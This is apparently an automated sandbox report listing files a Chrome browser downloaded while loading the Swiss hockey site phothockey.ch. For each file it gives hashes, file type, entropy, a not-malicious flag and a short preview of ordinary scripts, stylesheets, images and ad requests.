                                                                                                                                            SHA1:D3FC355C00A456BF784ADAD35A4E116DCABA2205
                                                                                                                                            SHA-256:9BE96155509100EDC6E6602C0987FBD2A7A7638002157ACF2D2654D7A4378D3F
                                                                                                                                            SHA-512:7E2F2F36278C6456B7B7F15C708211A808B0024E436BBC802689BD5CD7ABB2617BCBB1C85DFCCC18F03D8C05E16F76D03B1DF3D8F3985C0F2C758D7FD58E5435
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_4233.jpg
                                                                                                                                            Preview:RIFF.)..WEBPVP8X..............VP8 .(.......*....>.F.K%..'.7.i ..en-.<.m9.?..i.n;.t.)zL....r......../....|.H..=@?...z.t..~......n.......H........+...~]...?.?.\.;../@.o>..S.O............X.....s....".[{.~.u.....1.[.!7.A;.q.Ou;1.7.(...z\....6.x.*......nt.`..(.).$.N...dC].y.Bw.HB8.."W.x.^,..>0....Ja&....}~....9Fx.....2{.7(.....F.N.>.o..d..j.C.*.?%.7.T.c:.p.R.9h..x.....O....}T.....(Au1..Vw.....>b...;G....v.P.C)7....I,...|.}........,.@...'.z.....s#..`./....}rS..]54..Ug.C$.Q....g...se........-.]. .M.1......MK~.yy.2....z.........}...X.<..y..........z.i^D.g.a}...J.F.qT.......K\..-M..?S...R.....-.$3R/C."..,......3f.o...7...&.t..d]cZeN.d._#.,b.2?.....B.#5r........k..Q.Q...5.................z8.X...~.'.u).0...B1...3;i...a..0.r...<....i.Qc.l..d@t.?.#........oH%.{.;4..I...<O.v^<Wc.'.`zyU#.+7.....R.giz]..hgRn....y...|..y.....%....$S.oeh@....+.q.q.}.G..6..Y:..k..;_..J"!owY%+.d.C/...v....+LU.D,.Z..h.N5.+. .I..+/.!...=x......=.a".e....M.F&.... ..._ f....S.w..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (4186)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):181633
                                                                                                                                            Entropy (8bit):5.503743389132093
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:517DE93A8761BA97AE3082E9B3E46AC6
                                                                                                                                            SHA1:7A885C4D6038722C70CB9D9644963A702E5968AB
                                                                                                                                            SHA-256:8C2BC0BF7D4173AE067A69B92D929D2BF35BE376709117A97F1BF21D3B6BC6DE
                                                                                                                                            SHA-512:7A438AFB6697D3DBF02AA73EE44A05920064FC556D85BF67F3F9EE3A9EBEDC5A73528BAB4FD2E36E424E7C21E0C1715D87EF027418C10CBDE7BC14C33C962DC6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:(function(sttc){'use strict';var r,aa=Object.defineProperty;function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",fa={},ha={};function ia(a,b,c){if(!c||a!=null){c=ha[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ja(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in fa?f=fa:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(fa,d,{configurable:!0,writable:!0,value:b}):b!==c&&(ha[d]===void 0&&(a=Math.random()*1E9>>>0,ha[d]=da?ca.Symbol(d):"$jscp$"+a+"$"+d),aa(f,ha[d],{configurable:!0,writable:!0,value:b})))}}ja("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")},"es_next
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (55527)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):55602
                                                                                                                                            Entropy (8bit):5.25392621691251
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:02F4D55534574F5F19686746589C6FD3
                                                                                                                                            SHA1:142120593A6EA6F9DDB7892A6FDD3573B99B908E
                                                                                                                                            SHA-256:C3F8E1BC75D6E94CE21FE0AB26B161276A9A19E29706ABB5D3C718E2EBA06EA9
                                                                                                                                            SHA-512:BBA6F3AAD21FD8EBEA3465D4488C6C0688E39D543C0222B43F234B53CE7C44777054A5A62298A8FB0D76D1DAA51EC3D6C633B6DDBC2A31EE526F0179E3B93E8B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/advanced-iframe/js/ai.min.js?ver=570567
                                                                                                                                            Preview:/** Advanced iframe pro functions v2024.5. Created: 2024-05-27 20:03:44 */.var aiInstance,aiEnableCookie="undefined"!=typeof x&&aiEnableCookie,aiId="",aiExtraSpace=void 0===aiExtraSpace?0:aiExtraSpace,aiAccTime=0,aiRealFullscreen=void 0!==aiRealFullscreen&&aiRealFullscreen,aiInFullscreen=!1,aiOnloadEventsCounter=0,aiOverflowHtml=jQuery("html").css("overflow")??"visible",aiOverflowBody=jQuery("body").css("overflow")??"visible",aiCallbackExists=void 0!==aiReadyCallbacks&&aiReadyCallbacks instanceof Array,aiReadyCallbacks=aiCallbackExists?aiReadyCallbacks:[];function aiDebugExtended(a){"undefined"!=typeof aiShowDebug&&aiShowDebug&&console&&console.log&&console.log("Advanced iframe: "+a)}function aiResizeIframe(a,i,t){aiDebugExtended("aiResizeIframe");try{if("about:blank"===a.contentWindow.location.href)return;if(null!=a.contentWindow.document.body){var o=jQuery(window).scrollTop();a.style.marginTop=0,a.style.marginBottom=0,a.height=Number(t),a.style.height=Number(t)+"px";var r=aiGetIframe
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 399x209, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18154
                                                                                                                                            Entropy (8bit):7.909578979221415
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:F4EFA94E8DE4C8A9133CAECC024EBEC4
                                                                                                                                            SHA1:67039CCFD360BF21D1B5ECA6275F023BD232A765
                                                                                                                                            SHA-256:644B89B363400ABCAAB41A364175DE162DA9CEBAAB44B06AA6500306BC2A46E8
                                                                                                                                            SHA-512:A0C329C78BBDDD755E33B702733370F776D914A46278727216305D14E8EC38D8D96AA5AFCE5BB1F1F741FD744551D6DEF6DB657555B9421E7574AE12ACE75DF5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......JFIF...................................................#... ....+. $%(((..-1,&0"'(&...........'...''''''&(&''''&&&&'&&'(&&&&&''&&&&'&&&&&&&&&&'&&'&&....................................................F.......................!.1.AQ.."a2q......BT....#R....3br..$4.CS..Ds................................3......................!R.....1A.Qa.."2q...B.S.#C.............?....>.P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(.....T.@(........@*@.....>............h......c..?.....Q.C.W3...~....s.-G"..=\.V>............D8.s=X......G>jr.r-.....c..?.....Q.C.W3...~....s.-G"..=\.V>............D8.s=X......G>jr.r-.....c..?.....Q.C.W3...~....s.-G"..=\.V>............D8.s=X......G>jr.r-.....c..?.....Q.C.W3...~....s.-G"..=\.V>............D8.s=X......G>jr.r-.....c..?.....Q.C.W3...~....s.-G"..=\.V>............D8.s=X......G>jr.r-.....c..?.....Q.C.W3...~....s.-G"..=\.V>............D8.s=Yo.Gn.K.f......R..<
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4856
                                                                                                                                            Entropy (8bit):7.81433523292211
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D2CBD70EB43E4ACFE516FAE8E7CABBAD
                                                                                                                                            SHA1:65DA9DF60E66F4217932D5B3C903A9A74AB2FBD3
                                                                                                                                            SHA-256:66285E8CC7476EF9316CE53B582BA8A8CB71BE238630FD5AEE9FFD62CFD74AEC
                                                                                                                                            SHA-512:0840BCEBF16323C5D7883540F96FB2C5A25CF9DB19CBBE5129CCEBBBFD3967563FD22F95B8D5A53B516464F7EF949D353243BB268398AC776076839728D836EA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."................................................................................dhb...ap.{......&@BY..s.G..71.\...._#'...QU..1.L<...b.'.4..z....\<]!1.3...u_.......6c.0IH..[<..dLK.EZn'sN`.e..]..t..`.^..]..1{....d....%.T.l.Y<.^....*.".....5.<..^..<.w$.+H..9.)...c.{..]......;K.Z......vE...l..BU..j.A..W.Vy.....=...Xq..t=}X....f&....1..1....\..4O.....1.............................!"1...S#3ABQ.2RTUa..........V..@...,5...A$wW....8.G.$.\...=;.q>Yu.........m..@.v.i&...kp.H.^.BU..;../..M1.\....& .....'>...c6>..iR.Ep...z{....L..e...[....?.W..s....L..zQ....Lj=). .(..)..Np*2n.-......-?m........rk~.....W.....7".)..X3a.y.Y....P..QK.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (4408), with CRLF line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):62412
                                                                                                                                            Entropy (8bit):4.62487926136965
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:3DA4671834F66FF077FC8E3D7412B42F
                                                                                                                                            SHA1:D8FC7C6C850152A324F83CA63F657063E01C8235
                                                                                                                                            SHA-256:EBC8C0477756ADF012BF4F994B361237192719445D657373CA81641BB4381AF6
                                                                                                                                            SHA-512:AE26DAC910D0CEA59AD1598C92C751B648C6928014860FEA4E631494165E0628C9627FD94EEDE4CFDD1D3C67E687D202700DCAAA26F29A67D52196825D53997B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/uploads/elementor/css/post-8364.css?ver=1735241552
                                                                                                                                            Preview:.elementor-8364 .elementor-element.elementor-element-119930a{transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;margin-top:0px;margin-bottom:0px;}.elementor-8364 .elementor-element.elementor-element-119930a > .elementor-background-overlay{transition:background 0.3s, border-radius 0.3s, opacity 0.3s;}.elementor-8364 .elementor-element.elementor-element-e14c6b7 .tg-module-wrapper .module-title span, .elementor-8364 .elementor-element.elementor-element-e14c6b7 .tg-module-wrapper .tg-module-title-wrap .trending-news-title{background-color:#ED1515;}.elementor-8364 .elementor-element.elementor-element-e14c6b7 .tg-module-wrapper .module-title, .elementor-8364 .elementor-element.elementor-element-e14c6b7 .tg-module-wrapper .tg-module-title-wrap{border-bottom-color:#ED1515;}.elementor-8364 .elementor-element.elementor-element-e14c6b7 .tg-module-wrapper .module-title span{color:#ffffff;}.elementor-8364 .elementor-element.elementor-element-e14c6b7 .tg-module-wrapper .mod
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):6225
                                                                                                                                            Entropy (8bit):5.976934819783072
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2BD5C073A88B83ED74DB88282A56DDFB
                                                                                                                                            SHA1:D0EBFC376F8C6A44A8D4CD216817DCD7D0C33650
                                                                                                                                            SHA-256:AB5C23A05E39DEED14D9D8262B0DCE9F024F86105A27196CAD37D14A3F516E09
                                                                                                                                            SHA-512:5C6C4A92E93FC0F6A675658CC84F6187FDEBD3EEE94EFD07E24658736CBA598F3BC7156B19834B13FB44C1D43FCB7DF9FCCA7F0A453037E30DA76BA8F4B23B89
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.gstatic.com/s/i/productlogos/translate/v14/24px.svg
                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><defs><path d="M21.5 5h-9.17L11 1H2.5C1.68 1 1 1.68 1 2.5v15c0 .83.68 1.5 1.5 1.5h9.17L13 23h8.5c.82 0 1.5-.68 1.5-1.5v-15c0-.83-.68-1.5-1.5-1.5z" id="a"/></defs><clipPath id="b"><use overflow="visible" xlink:href="#a"/></clipPath><g clip-path="url(#b)"><image height="31" opacity=".2" overflow="visible" transform="translate(3 1)" width="29" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB0AAAAfCAYAAAAbW8YEAAAACXBIWXMAAAsSAAALEgHS3X78AAAA GXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABQBJREFUeNq8V8tu20YUvXdm+LCk RKiMwI1TFEXhVZJd1gW66xekv9DPqPsvXdU/UaDroJskKy+CInCcGpKtFy2SM/f2DEXZia0odtKW AkFJ8zhzzn3S0Ycvps+79EMDbj3Yfgv4EM+XTN/fEOb3Zg3AXmq7j64D5/e/x/EfzZMnX5jx+LFZ LLyp6yNDOzskYb6RubFdpbdvKUl2Jc+d9PvP5dmzUyH6TVoYXQOq+H5g9vb+cONsO9maLpIyyZPU kZNAppmh9Vpg5kSXwCSVJ5/Vi/r8Tl73y2F9ePidJ3oaga+B4vkUgF+6EW1ndz11gvNdDdL1bDN
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (430), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):430
                                                                                                                                            Entropy (8bit):5.356187704390107
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4869790D85F5D39FB97B42B0F54A676E
                                                                                                                                            SHA1:59B31EC4D074013B3D80D524157C3DCDFCC85130
                                                                                                                                            SHA-256:50D76EA2B0E662C1839285556FFF8D18B30863AEB686B78DC59AF658787FF744
                                                                                                                                            SHA-512:2B96B1F448DF1FA607A2785107D19906DEB8E8D72A5B67B4A22DD9041CDE933B226434AEBFD62AA9AACC69AAD4BE1FC1B9D65A04D4256E49EA914C453CAD8EE1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-5534394335622311&output=html&h=280&adk=2621726817&adf=3076280727&pi=t.aa~a.2011184790~rp.1&w=1140&abgtt=6&fwrn=4&fwrnh=100&lmt=1736177778&rafmt=1&to=qs&pwprc=9468878717&format=1140x280&url=https%3A%2F%2Fphothockey.ch%2F&fwr=0&pra=3&rpe=1&resp_fmts=3&wgl=1&fa=40&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177777810&bpp=1&bdt=30235&idt=-M&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D271b0c5861eb301c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MbbkKdxZ3r4oXe0CAZ1aXtk3TXpXw&gpic=UID%3D00000fa80f72307c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MYYYAF9Bdmqy81LoPXnol1uur86yA&eo_id_str=ID%3Dcfbf4971db1f6709%3AT%3D1736177771%3ART%3D1736177771%3AS%3DAA-AfjaNDk_NqCEVnmF5j0CX-A32&prev_fmts=0x0%2C1200x280%2C1140x280&nras=4&correlator=3928226519857&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=70&ady=2420&biw=1280&bih=907&scr_x=0&scr_y=0&eid=95349404&oid=2&psts=AOrYGsniE92yE7oteJqKKRfefsOegqwWFwtC4f5XcCAiy01X5Sww2gbpyJcDSZgLCDwu1BWBrrEUTbr1g-R1Hjf1dzQoRfM&pvsid=2286212169202884&tmod=1523322118&uas=1&nvt=1&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=4&uci=a!4&btvi=1&fsb=1&dtd=233
                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CPGf05624YoDFZaMgwcdt-0wWg"}],"googMsgType":"sth"}', '*');</script><script>window.top.postMessage('{"msg_type":"adsense-labs","key_value":[{"key":"settings","value":"[\\\"ca-pub-5534394335622311\\\"]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):17546
                                                                                                                                            Entropy (8bit):6.016661088636336
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:08A66D040FC9174E982958E8C2B86152
                                                                                                                                            SHA1:3E4F7377BECA9BCE4A698C5908317D721A4C1658
                                                                                                                                            SHA-256:B91B5894409262EEA41FBDA6FCD59F9851AC7651722F496321B85F9EFF1A0D54
                                                                                                                                            SHA-512:DCAE8BBF83FA34A2C24C44CE9FECE43E35248BF07F71A94ABC0CB0BDD1F72C436F16A13524D0C4EE9DDFC407738A130CDD67A5D85F44F91F84CC32BDECF692EA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ep1.adtrafficquality.google/getconfig/sodar?sv=200&tid=gda&tv=r20241212&st=env
                                                                                                                                            Preview:{"sodar_query_id":"vPh7Z9DGD8zox_AP773lyAI","injector_basename":"sodar2","bg_hash_basename":"SpkypshKgSogYQ2K2Rf8n1LXP_m6U7d6Y-cIlE_Kkgg","bg_binary":"FUnqtAkqpYLy/Av/mt+66GZ8EcWpdjt2/5ngNgJ9iB4fjbJaCAn1IFXWXbjwQqMr3fOdSx5r0Q94icYqfR0rqVJx+kdvlF78WCviF6mZCW2mH4gER3/4z3EhDOIXgwe7Tq/IdgJ5I6lHbywlSAHjz8R6tsFOIgUhCjB/rnu2Zi0bXTpmA9LktSLRsj6zvle7LTj7nkTY2uJrvOXfbSMGH1sLOTnVhjcSPYobYYru1BZs1PYheGkj/sVgdku2cWeQOesE/N4n+ytMzUB6VFdTsO0LWivB3oq01003Uh2CE4M+5v1zGfDUuFtxAtM3xnGsIobMfXTdy5JawzCWgNZWtjRw7mq0ci9sBKrNeqbI4cEtEvS4O4MhUxpLXnsE/+7v0jfXRGm9BpxTAcGot08yhWE1ptXjWqA5alFo/Tsa6LTh7zjvmVSjjdO73JKq06TIpeq9oDRxNJ1IBkQJqHwkPCjt3wdIHAn/5dqJGE4yr9swVTFRzsYBdrnP8BsZWrq1smyayhQfnodOleFeO5FK6kwuyfaW9IfVdtv4NwKPqP0kz2OirUF6rDuRVgk1Y7YRZxKwBarn6wg71Jed8MhgxdTDC+ulHBFtEesVqqMEudxGfOIVewxGhujVAyIFIiDhgbkMCbUoJI4lEy4gCzHkSJR7PdgaCEQl8Ou6M1uxlSQupge3jVqsSER/3r+OLYR7uvc8FXNCZgA4sSaFJldq1dICKjMciMMX47ZpbzNbw3h9d0vWrOyFsG24B63dP6FLwHkW/+vOqVCJkixJ7fjz8LyC8njVfKhKmlE/lFvN9/A5fFGb7GFufWIPx1qczkK7mvmKJN5enVi6N9ujP
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):43
                                                                                                                                            Entropy (8bit):2.7374910194847146
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                            SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                            SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                            SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:GIF89a.............!.......,...........D..;
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (2181), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2181
                                                                                                                                            Entropy (8bit):5.138465205580499
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:5FB55A9E16C2A112A18989F1B0B08485
                                                                                                                                            SHA1:EB9BA6AB4ABD6AFDE76C714542FA1906B867602E
                                                                                                                                            SHA-256:D35FC86BDB6BF9102349BB4DE42FD68542BA69DACC1B80B0D9629CC4841A75DC
                                                                                                                                            SHA-512:0EBACEE7410C0028D70AF4EC10A011D804C09D5BAEFAA7B9BED3BBC1E7D1A93B5EA2AE531DE303475E25C585283AF87AE9B3A47959AB10F754467E4BBB59DF58
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/blockspare/assets/js/countup/jquery.counterup.min.js?ver=1
                                                                                                                                            Preview:(function($){"use strict";$.fn.counterUp=function(options){var settings=$.extend({time:400,delay:10,offset:100,beginAt:0,formatter:false,context:"window",callback:function(){}},options),s;return this.each(function(){var $this=$(this),counter={time:$(this).data("counterup-time")||settings.time,delay:$(this).data("counterup-delay")||settings.delay,offset:$(this).data("counterup-offset")||settings.offset,beginAt:$(this).data("counterup-beginat")||settings.beginAt,context:$(this).data("counterup-context")||settings.context};var counterUpper=function(){var nums=[];var divisions=counter.time/counter.delay;var num=$(this).attr("data-num")?$(this).attr("data-num"):$this.text();var isComma=/[0-9]+,[0-9]+/.test(num);num=num.replace(/,/g,"");var decimalPlaces=(num.split(".")[1]||[]).length;if(counter.beginAt>num)counter.beginAt=num;var isTime=/[0-9]+:[0-9]+:[0-9]+/.test(num);if(isTime){var times=num.split(":"),m=1;s=0;while(times.length>0){s+=m*parseInt(times.pop(),10);m*=60}}for(var i=divisions;
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):42
                                                                                                                                            Entropy (8bit):2.9881439641616536
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                            SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                            SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                            SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsskPiEmya7tT9jy_ruCjg3VRTNlpoLzKuHDXp4R9K23XsC-CMBmPK4X8znlVWBgBPlF-t0pdwbON7HBf-_0GmMp1Z-fh87Vk1S1sCYTnidWNBoAQNA9D0k0JbxZz0II0GmbvmA7G9cYYAt3kd8HYq-Buvt1fEN6sw2CgBLpf3CD8y9rSIgvRjWwcKhli4AOskCUhxtCjTGEZfC7Mx6IDzG_wjUd8UdxiigsdsZ-V6O_C5hKlViDprWReMemVrFiv25kGx5Kpy2rAd3eg9LHheMgdb39E-nXabOJvCrQXd0UcqI1Km_Ddy24DoQESyzhgHfgsL8KbPpT8g_h6zZbnFq0-6y5laQLUVn0818oGZfKM6pU3CzY9FjSd1CpUh-234jNXmFN5IZahBWCdtqggo0PFFMJzcR-ezxAowIhjhwYGBtDQAMzEAmDr8mg66bVRQrWEPqFhrZvWOdFNELfF43sKX0E8lDCjMHUlVbt_gIVgWyas3vNBsBgVprTFpf_JejzABBUCAajIGN9XBZkIbcmXR9MvvgGynGEV8cOCuArCX6Lr5D6IcfJygu4s7leumvUnkIUgf9iIfmIIVEp5qzoFhJ-oQLCpMg7ajgNs85oRiwCogfuNz7lqoA2MREF1sgDo94jEfsfazPbDd-ApHr3ehdwCMRwXq04rNKkjnW13VzpTTWnfeSw3Gx78q6J1CcktyFxiU4ZNthoaThQN3GaRfdPZq8ey6l1VhPCOYviWNfEdi5bP1PAJ4vO0W3eNziYKnV9DASjUtm623gU0Vu_2iJpFzZejXHOq7_30i9Hpb-QVbM8dHEJUviy6nmPXLWkDyLYhAlodozOTT5Rf086CN25AY3CavRRkk6CM0aolW6imEK3JHaiS16z9ZxnAFKtFqYpYxm_BVZCrvjqpc43OxXU9htaFf1Serf2eBYM8NV7D9XfnQJhrx_UTEvYLhN1lKEKtOJGaTuR239nYC8_xjxD2TMIIq3PeS4RL08450tK8BtcgUwxGAJQzgvLvunJBLJUpTapPgMpAXZwYNCzL0iY8JZQUBgEJAiQHGWzTB-hP4ZstB3cvVHO3xtQKFFHUFlCZEjT1P11xmaKL5SD-tv22TybyN_PcLiWrCclSGicZZ3L2HK9doujLdQ4rpiJqKa9sTxeirgC8CTl_bEVdGK9lyoIyjTZNfICRxCWhi8MAFgXCi6qkpqXtbbyGyC7osjie0uOoAvS5Z2GKM3d6sIc7o0oHSUFu5EMwPBTdVK2EKr1uyGEvfZtag9X0Y587CKLJOmZWWldjZ0jOnw4USHzj3HmUawFGGw-24H_l82PTrpArk9vbYPxxXFVG-RhteSNjchjVZC5z6M3idsG1lwOlZZcuIPDQ9-tUr9hWsqFx2Z_86aKDQMMHpDou6nL3nMpqxWzNXSpWZy7G-hZXSpvgvucygQVBnoA-OPWNMrtaqDbW283uNq9-vGQY_Hyzgw&sai=AMfl-YR8EFImB5EYFYo_MU7UA0UOYUOReUDPZ3IIq_efDvXL4-JfYANFQnaqx1JEJcBaXbPCzVaYKSZP69p4TcIGF2SsIT5hmNfVKKpZOJHV5mVsp481sdTh5wfaF9EoO2jF6EV3LtxXYbt2&sig=Cg0ArKJSzPC27ovhYowEEAE&cid=CAQSOwCa7L7dFYL-PC4f6s__IGXG3N8xwo71W1dYhJy-Ji53TD8KzbU3BoRWATuyjHAx1UWNDENjFYR5Kn_RGAE&id=lidartos&mcvt=45929&p=0,0,280,1200&tm=47317.79999999999&tu=1388.8999999999942&mtos=45929,45929,45929,45929,45929&tos=45929,0,0,0,0&v=20241204&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=22&adk=935936864&rs=2&la=1&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=b&co=3211057301&rst=1736177769736&rpt=5235&ec=1&met=mue&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                            Preview:GIF89a.............!.......,...........D.;
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 51248, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):51248
                                                                                                                                            Entropy (8bit):7.995148409878223
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:66A8097DE979896B872F5CBE028A9BFD
                                                                                                                                            SHA1:2EEE8B7DE801ED90605BA64E3E44D1840BDA99D9
                                                                                                                                            SHA-256:DB5C97CAC7B445E8BFB2C7493F48575FAE914C8B157F7497AD015A0833494B29
